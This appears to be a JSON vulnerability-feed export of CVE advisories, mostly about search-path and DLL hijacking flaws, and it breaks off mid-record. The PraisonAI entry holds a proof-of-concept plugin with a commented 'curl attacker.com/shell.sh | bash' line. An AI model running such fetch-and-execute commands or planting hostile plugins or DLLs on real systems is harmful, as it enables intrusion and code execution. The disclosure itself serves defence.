{"success":true,"data":{"threats":[{"id":"8c945dde-29e2-48c5-83c9-680b10457bb1","slug":"cve-2026-61446","externalId":"GHSA-m6wp-h223-4c8g","source":"OSV","sourceType":"ghsa","type":"vulnerability","title":"PraisonAI: Plugin Auto-Discovery Executes Arbitrary Python Files Without Verification","description":"### Summary\nThe plugin manager loads and executes arbitrary `.py` files from `.praisonai/plugins/` directories (both project-level and user home) via `importlib.util.spec_from_file_location()` + `exec_module()` with zero code signing, integrity verification, or sandboxing. Any attacker who can write a file to the plugins directory (via path traversal, supply chain attack, or compromised dependency) achieves arbitrary code execution when the plugin system initializes.\n\n### Details\n\n`src/praisonai-agents/praisonaiagents/plugins/manager.py` (lines 163-196):\n\n```python\ndef _load_plugin_file(self, file_path: Path) -> Optional[Plugin]:\n    module_name = f\"praison_plugin_{file_path.stem}_{id(file_path)}\"\n    spec = importlib.util.spec_from_file_location(module_name, file_path)\n    module = importlib.util.module_from_spec(spec)\n    sys.modules[module_name] = module\n    spec.loader.exec_module(module)  # Executes arbitrary Python code\n\n    if hasattr(module, \"create_plugin\"):\n        return module.create_plugin()  # Calls arbitrary function\n```\n\n`src/praisonai-agents/praisonaiagents/plugins/discovery.py` (lines 38-39):\n\n```python\n# Auto-discovery paths:\n# 1. Project: ./.praisonai/plugins/\n# 2. User: ~/.praisonai/plugins/\n```\n\nNo code signing, hash verification, or sandboxing is applied. The only validation is checking for a `Plugin Name` field in the file's docstring header.\n\n\n### PoC\n\n```python\nfrom praisonaiagents.plugins.discovery import load_plugin\nimport tempfile, os\n\n# Create a \"malicious\" plugin\ntest_dir = tempfile.mkdtemp()\nplugin_file = os.path.join(test_dir, 'evil.py')\nwith open(plugin_file, 'w') as f:\n    f.write('\"\"\"\\nPlugin Name: Evil Plugin\\nDescription: test\\nVersion: 1.0.0\\n\"\"\"\\n'\n            'PROOF = \"CODE_EXECUTED_AT_IMPORT_TIME\"\\n'\n            '# In a real attack: os.system(\"curl attacker.com/shell.sh | bash\")\\n'\n            'def create_plugin():\\n    return {\"name\": \"evil\"}\\n')\n\n# Load it\nresult = load_plugin(plugin_file)\nprint(f\"Result: {result}\")  # {'name': 'Evil Plugin', ...}\n\n# Verify code executed\nimport sys\nfor name, mod in sys.modules.items():\n    if 'evil' in name:\n        print(f\"EXPLOIT CONFIRMED: {mod.PROOF}\")  # \"CODE_EXECUTED_AT_IMPORT_TIME\"\n```\n\n**Tested result:** Plugin file was loaded via `exec_module()`, and the `PROOF` variable confirmed code execution at import time.\n\n### Impact\n\n- **Arbitrary code execution**: Any `.py` file in the plugins directory is executed with full Python access\n- **No user interaction required**: Plugins are auto-discovered and loaded at framework initialization\n- **Persistence**: A planted plugin survives restarts and executes every time the framework starts\n- **Attack chain**: Combine with path traversal (write_file tool) to plant the plugin remotely","cveId":"CVE-2026-61446","cvssScore":null,"cvssVector":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","severity":"high","vendor":"PyPI","product":"praisonaiagents","affectedVersions":["pkg:pypi/praisonaiagents < 1.6.78"],"cwes":["CWE-427","CWE-94"],"tags":["osv","osv:ghsa-m6wp-h223-4c8g","ecosystem:pypi"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://osv.dev/vulnerability/GHSA-m6wp-h223-4c8g","type":"advisory","title":"OSV GHSA-m6wp-h223-4c8g"},{"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-m6wp-h223-4c8g","type":"other","title":"OSV web"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-61446","type":"advisory","title":"OSV advisory"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-62165","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/MervinPraison/PraisonAI","type":"vendor","title":"OSV package"},{"url":"https://www.vulncheck.com/advisories/praisonai-before-remote-code-execution-via-plugin-auto-discovery","type":"other","title":"OSV web"}],"epssScore":0.00325,"epssPercentile":0.23556,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T16:44:04.000Z","addedAt":"2026-10-08T18:42:42.574Z","updatedAt":"2026-10-08T18:42:42.574Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-61446","note":"may still be awaiting NVD analysis"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-61446","note":"authoritative record"},{"label":"GitHub Advisory","url":"https://github.com/advisories/GHSA-m6wp-h223-4c8g"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-m6wp-h223-4c8g"}]},{"id":"22d5e2ff-bf1b-4efc-abf9-10f0719206ad","slug":"cve-2026-107615","externalId":"CVE-2026-107615","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-107615 — An uncontrolled search path element vulnerability in GlavSoft TightVNC Server for Windows before 2.8.88 allows a local authenticated user to execut…","description":"An uncontrolled search path element vulnerability in GlavSoft TightVNC Server for Windows before 2.8.88 allows a local authenticated user to execute arbitrary code with SYSTEM privileges. DynamicLibrary::init() (and ThemeLib) load screenhooks32.dll / screenhooks64.dll with LoadLibrary() using a bare file name and no LOAD_LIBRARY_SEARCH_* flags, so the TightVNC service follows the default DLL search order and loads an attacker-planted DLL from a writable directory earlier in that order (for example, an installation directory with permissive ACLs).","cveId":"CVE-2026-107615","cvssScore":7.8,"cvssVector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-427"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://sourceforge.net/p/vnc-tight/bugs/1666/","type":"advisory","title":"33c584b5-0579-4c06-b2a0-8d8329fcab9c"},{"url":"https://www.tightvnc.com/whatsnew.php","type":"advisory","title":"33c584b5-0579-4c06-b2a0-8d8329fcab9c"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T14:16:50.313Z","addedAt":"2026-10-08T14:40:02.832Z","updatedAt":"2026-10-08T23:06:38.121Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-107615","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-107615","note":"authoritative record"}]},{"id":"086cabf8-1592-458e-81c5-ccc564c41e6f","slug":"cve-2026-106186","externalId":"CVE-2026-106186","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-106186 — Uncontrolled search path element in CredentialProvider in Google Chrome on on Windows prior to 155.0.8059.39 allowed a local attacker to potentiall…","description":"Uncontrolled search path element in CredentialProvider in Google Chrome on on Windows prior to 155.0.8059.39 allowed a local attacker to potentially execute arbitrary code outside the sandbox via a local program. (Chromium security severity: Low)","cveId":"CVE-2026-106186","cvssScore":8.6,"cvssVector":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H","severity":"high","vendor":"google","product":"chrome","affectedVersions":["< 155.0.8059.39"],"cwes":["CWE-427"],"tags":["nvd","status:awaiting-analysis","status:analyzed"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://chromereleases.googleblog.com/2026/10/stable-channel-update-for-desktop_086471744.html","type":"vendor","title":"Release Notes"},{"url":"https://issues.chromium.org/issues/522557469","type":"advisory","title":"Permissions Required"}],"epssScore":0.00126,"epssPercentile":0.02008,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-06T19:17:44.627Z","addedAt":"2026-10-06T20:39:30.510Z","updatedAt":"2026-10-08T14:40:01.645Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-106186","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-106186","note":"authoritative record"}]},{"id":"421ecc28-84d1-42c9-95d5-11059c8bdf33","slug":"cve-2026-104809","externalId":"CVE-2026-104809","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-104809 — DigitalCanion has discovered a vulnerability that allows an attacker to cause the system to load an attacker-controlled .so file instead of the exp…","description":"DigitalCanion has discovered a vulnerability that allows an attacker to cause the system to load an attacker-controlled .so file instead of the expected legitimate module. The loading mechanism relies on a predictable module name without adequately verifying the file’s origin or integrity. A malicious shared object using the expected name can therefore be loaded by a privileged process. The module code then executes within the context and privileges of that process. This results in arbitrary code execution and full compromise of the Mitel Linux virtual machine.","cveId":"CVE-2026-104809","cvssScore":8.4,"cvssVector":"CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:X/V:X/RE:X/U:Amber","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-73","CWE-426","CWE-427","CWE-494","CWE-829"],"tags":["nvd","status:received","status:deferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://digitalcanion.com/en/security-research/#vendor=mitel&status=cna","type":"advisory","title":"vulnerability@ncsc.ch"}],"epssScore":0.00087,"epssPercentile":0.00329,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-05T09:17:10.007Z","addedAt":"2026-10-05T09:50:40.896Z","updatedAt":"2026-10-06T15:50:57.446Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-104809","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-104809","note":"authoritative record"}]},{"id":"38d48fb7-4874-477c-8e38-2b28fc4d84e1","slug":"cve-2026-47570","externalId":"CVE-2026-47570","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-47570 — NVIDIA GPU Display Driver for Windows contains a vulnerability in the CUDA driver where an attacker could cause a library to be loaded from an unco…","description":"NVIDIA GPU Display Driver for Windows contains a vulnerability in the CUDA driver where an attacker could cause a library to be loaded from an uncontrolled search path. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, data tampering, and denial of service.","cveId":"CVE-2026-47570","cvssScore":7.8,"cvssVector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-427"],"tags":["nvd","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/NVIDIA/product-security/tree/main/2026/5861","type":"advisory","title":"psirt@nvidia.com"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-47570","type":"advisory","title":"psirt@nvidia.com"},{"url":"https://www.cve.org/CVERecord?id=CVE-2026-47570","type":"advisory","title":"psirt@nvidia.com"}],"epssScore":0.00136,"epssPercentile":0.02615,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-30T16:17:25.970Z","addedAt":"2026-09-30T17:50:48.200Z","updatedAt":"2026-10-02T05:50:39.501Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-47570","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-47570","note":"authoritative record"}]},{"id":"cedc1631-89d1-4926-a12d-8e705d12911e","slug":"cve-2026-89325","externalId":"CVE-2026-89325","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-89325 — An uncontrolled search path element in InsightVM assessment content in Rapid7 Insight Agent on Windows allows a local, low-privileged user to execu…","description":"An uncontrolled search path element in InsightVM assessment content in Rapid7 Insight Agent on Windows allows a local, low-privileged user to execute arbitrary code as SYSTEM via a planted executable resolved from the machine PATH.\n\nAssessment content at or below version 0.0.261.0 included a check that invoked the `code` command without a fully qualified path from a process running as SYSTEM. The command was resolved against the machine PATH environment variable at execution time. Where the machine PATH contained a directory writable by non-administrative users and ordered ahead of the legitimate Visual Studio Code installation, a local user could place an executable named `code` in that directory and cause the agent to execute it with SYSTEM privileges.\n\nThe version range above refers to InsightVM assessment content versions, not Insight Agent versions. All Insight Agent versions were affected while running assessment content at or below 0.0.261.0. Assessment content is delivered to all Insight Agents via the Rapid7 Insight Platform independently of the Insight Agent version and is not customer-managed.\n\nThis issue was resolved in assessment content version 0.0.269.0, which was made generally available on September 15, 2026. Remediation was deployed automatically and no customer action is required.","cveId":"CVE-2026-89325","cvssScore":7.8,"cvssVector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-427"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://docs.rapid7.com/insight/release-notes-2026-september/#resolved-cve-2026-89325","type":"advisory","title":"cve@rapid7.com"}],"epssScore":0.0013,"epssPercentile":0.02267,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-24T19:17:19.580Z","addedAt":"2026-09-24T19:50:39.614Z","updatedAt":"2026-09-26T05:50:38.011Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-89325","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-89325","note":"authoritative record"}]},{"id":"1084f66c-f8b9-4a33-b4f2-047a3e401498","slug":"cve-2026-6935","externalId":"CVE-2026-6935","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-6935 — IBM Concert 1.0.0 through 3.0.0 invokes operating system commands without fully qualifying executable paths or adequately restricting search path r…","description":"IBM Concert 1.0.0 through 3.0.0 invokes operating system commands without fully qualifying executable paths or adequately restricting search path resolution. As a result, an attacker with local system access can manipulate the search path environment to execute untrusted or malicious code.","cveId":"CVE-2026-6935","cvssScore":7.8,"cvssVector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","severity":"high","vendor":"ibm","product":"concert","affectedVersions":[">= 1.0.0, <= 3.0.0"],"cwes":["CWE-427"],"tags":["nvd","status:received","status:awaiting-analysis","status:analyzed"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":true,"patchLinks":["https://www.ibm.com/support/pages/node/7288830"],"references":[{"url":"https://www.ibm.com/support/pages/node/7288830","type":"patch","title":"Patch"}],"epssScore":0.00119,"epssPercentile":0.01611,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-23T21:17:02.553Z","addedAt":"2026-09-23T21:50:38.941Z","updatedAt":"2026-09-29T15:50:40.656Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-6935","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-6935","note":"authoritative record"}]},{"id":"13d16d1e-1e27-409c-8192-551f40517aad","slug":"cve-2026-91803","externalId":"CVE-2026-91803","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-91803 — A local privilege escalation vulnerability exists in the updater of Foxit PDF Editor/Reader due to unsafe loading of dynamic-link libraries from a …","description":"A local privilege escalation vulnerability exists in the updater of Foxit PDF Editor/Reader due to unsafe loading of dynamic-link libraries from a user-writable directory during high-privilege operations. A local attacker could exploit this issue to execute code with elevated privileges.","cveId":"CVE-2026-91803","cvssScore":7.8,"cvssVector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","severity":"high","vendor":"foxit","product":"pdf editor","affectedVersions":["<= 13.2.5.63482",">= 14.0.0.33046, <= 14.0.7.33751",">= 2023.1.0.15510, <= 2023.3.0.23028",">= 2024.1.0.23997, <= 2024.4.1.27687",">= 2025.1.0.27937, <= 2025.3.0.35737",">= 2026.1.0.36452, <= 2026.2.0.39747","<= 2026.2.0.39747"],"cwes":["CWE-427"],"tags":["nvd","status:received","status:awaiting-analysis","status:analyzed"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://www.foxit.com/support/security-bulletins.html","type":"vendor","title":"Vendor Advisory"}],"epssScore":0.00116,"epssPercentile":0.01496,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-23T08:17:12.363Z","addedAt":"2026-09-23T09:50:38.115Z","updatedAt":"2026-10-08T14:40:00.852Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-91803","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-91803","note":"authoritative record"}]},{"id":"b9607ebf-4d0c-4dca-819a-c52fd7c8a515","slug":"cve-2026-83598","externalId":"CVE-2026-83598","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-83598 — Netdata is an open source observability tool.","description":"Netdata is an open source observability tool. From rom 2.0.0 until 2.10.4, during Netdata Windows Agent MSI repair, powershell.exe runs as SYSTEM without -NoProfile and loads %USERPROFILE%\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1 from the low-privileged user who initiated repair. Commands placed in that profile before repair therefore execute with SYSTEM privileges. This vulnerability is fixed in 2.10.4.","cveId":"CVE-2026-83598","cvssScore":7.8,"cvssVector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-269","CWE-427"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/netdata/netdata/commit/d762782697623a98b51b4e41f7fe2d12404f0662","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/netdata/netdata/pull/22751","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/netdata/netdata/releases/tag/v2.10.4","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/netdata/netdata/security/advisories/GHSA-8hxv-2mg6-ggw5","type":"advisory","title":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}],"epssScore":0.00156,"epssPercentile":0.04189,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-22T17:17:25.807Z","addedAt":"2026-09-22T17:50:43.455Z","updatedAt":"2026-09-23T19:50:39.755Z","epssUpdatedAt":"2026-10-07T12:00:27.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-83598","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-83598","note":"authoritative record"}]},{"id":"7cad6928-6302-48ad-89d5-3fe21e5541c4","slug":"cve-2026-25264","externalId":"CVE-2026-25264","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-25264 — Privilege escalation due to weak configuration during package extraction process.","description":"Privilege escalation due to weak configuration during package extraction process.","cveId":"CVE-2026-25264","cvssScore":8.8,"cvssVector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H","severity":"high","vendor":"qualcomm","product":"software center","affectedVersions":["1.17.1","1.19.1","1.21.0","1.22.1","1.25.1","1.26.0"],"cwes":["CWE-427"],"tags":["nvd","status:received","status:awaiting-analysis","status:analyzed"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://docs.qualcomm.com/product/publicresources/securitybulletin/june-2026-bulletin.html","type":"vendor","title":"Vendor Advisory"}],"epssScore":0.00075,"epssPercentile":0.00077,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-22T10:17:09.110Z","addedAt":"2026-09-22T11:50:37.781Z","updatedAt":"2026-09-25T13:50:38.690Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25264","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-25264","note":"authoritative record"}]},{"id":"0b9ac22f-53bb-436d-a463-4746d9debcf2","slug":"cve-2026-54916","externalId":"CVE-2026-54916","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-54916 — NetBox Device Type Library is a collection of community-sourced device type definitions for import into NetBox.","description":"NetBox Device Type Library is a collection of community-sourced device type definitions for import into NetBox. The absence of tests/init.py and the lack of --import-mode=importlib cause pytest prepend import mode to place the tests directory at the front of sys.path during collection. An unauthenticated contributor can add a module such as tests/git.py that shadows GitPython when tests/definitions_test.py executes from git import Git, Repo, or add tests/conftest.py for automatic collection-time execution. Python imports and runs the pull-request module before any test function, allowing arbitrary code execution on the GitHub Actions runner, test-result tampering, and access to tokens or network resources exposed to the workflow. This module-shadowing path is independent of the earlier pickle deserialization flaw and the separately tracked NETBOX_DT_LIBRARY_URL issue. This vulnerability is fixed by commit b0d9a3dadd0a0a9d3c93b0b2777559fd4bad1037.","cveId":"CVE-2026-54916","cvssScore":8.8,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-427","CWE-829"],"tags":["nvd","status:received","status:deferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/netbox-community/devicetype-library/commit/b0d9a3dadd0a0a9d3c93b0b2777559fd4bad1037","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/netbox-community/devicetype-library/pull/4239","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/netbox-community/devicetype-library/security/advisories/GHSA-wwg5-825x-83g6","type":"advisory","title":"security-advisories@github.com"}],"epssScore":0.00611,"epssPercentile":0.47632,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-17T21:17:17.790Z","addedAt":"2026-09-17T21:50:37.995Z","updatedAt":"2026-09-24T21:50:42.672Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-54916","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-54916","note":"authoritative record"}]},{"id":"2b6463e4-2f59-4431-ab34-d38bcca6e738","slug":"cve-2026-56795","externalId":"CVE-2026-56795","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-56795 — Dell Server Update Utility, versions prior to 26.07.01, contains an Uncontrolled Search Path Element vulnerability.","description":"Dell Server Update Utility, versions prior to 26.07.01, contains an Uncontrolled Search Path Element vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Code execution.","cveId":"CVE-2026-56795","cvssScore":8.2,"cvssVector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-427"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://www.dell.com/support/kbdoc/en-us/000509930/dsa-2026-422-security-update-for-dell-server-update-utility-suu-vulnerability","type":"advisory","title":"security_alert@emc.com"}],"epssScore":0.00188,"epssPercentile":0.07732,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-17T16:17:31.893Z","addedAt":"2026-09-17T17:50:44.284Z","updatedAt":"2026-09-19T15:50:36.228Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-56795","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-56795","note":"authoritative record"}]},{"id":"df6a2a0a-acc9-4363-98a5-62e4cdeb1c8b","slug":"cve-2026-92838","externalId":"CVE-2026-92838","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-92838 — A DLL hijacking\nvulnerability exists in the GeoVision GV-Remote E-Map desktop\napplication.","description":"A DLL hijacking\nvulnerability exists in the GeoVision GV-Remote E-Map desktop\napplication. The application loads one or more dynamic-link libraries (DLLs)\nfrom an unsafe search path, allowing a local attacker to place a malicious DLL\nin a location searched before the legitimate library location. If\nsuccessfully exploited, an attacker with local write access to the affected\ndirectory could achieve arbitrary code execution in the security context of\nthe GV-Remote E-Map process.","cveId":"CVE-2026-92838","cvssScore":7.8,"cvssVector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-427"],"tags":["nvd","status:received","status:deferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://hackerone.com/reports/1437942","type":"advisory","title":"0df08a0e-a200-4957-9bb0-084f562506f9"},{"url":"https://www.cve.org/CVERecord?id=CVE-2020-26947","type":"advisory","title":"0df08a0e-a200-4957-9bb0-084f562506f9"},{"url":"https://www.geovision.com.tw/cyber_security.php","type":"advisory","title":"0df08a0e-a200-4957-9bb0-084f562506f9"}],"epssScore":0.00198,"epssPercentile":0.08798,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-17T02:16:28.610Z","addedAt":"2026-09-17T03:50:35.533Z","updatedAt":"2026-09-18T19:50:38.574Z","epssUpdatedAt":"2026-10-07T12:00:27.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-92838","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-92838","note":"authoritative record"}]},{"id":"b786bdf8-3eae-4c6b-8f65-6928e0411d25","slug":"cve-2026-92180","externalId":"CVE-2026-92180","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-92180 — pdfforge PDF Architect activation-service Update Service Uncontrolled Search Path Element Local Privilege Escalation Vulnerability.","description":"pdfforge PDF Architect activation-service Update Service Uncontrolled Search Path Element Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of pdfforge PDF Architect. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the activation-service process. The product loads a library from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of SYSTEM. Was ZDI-CAN-29536.","cveId":"CVE-2026-92180","cvssScore":7.8,"cvssVector":"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-427"],"tags":["nvd","status:received","status:deferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://www.zerodayinitiative.com/advisories/ZDI-26-615/","type":"advisory","title":"zdi-disclosures@trendmicro.com"}],"epssScore":0.00195,"epssPercentile":0.08431,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-15T19:17:48.487Z","addedAt":"2026-09-15T19:50:37.850Z","updatedAt":"2026-09-16T21:50:37.789Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-92180","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-92180","note":"authoritative record"}]},{"id":"949fd11d-a8c1-42ed-8c88-aec9f9efadd0","slug":"cve-2026-68955","externalId":"CVE-2026-68955","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-68955 — The installer for Rakuten Kobo Desktop Application (Windows version) insecurely loads Dynamic Link Libraries.","description":"The installer for Rakuten Kobo Desktop Application (Windows version) insecurely loads Dynamic Link Libraries. If there is a crafted DLL at the same directory when invoking the affected installer, arbitrary code may be executed with the privileges of the user who performed the 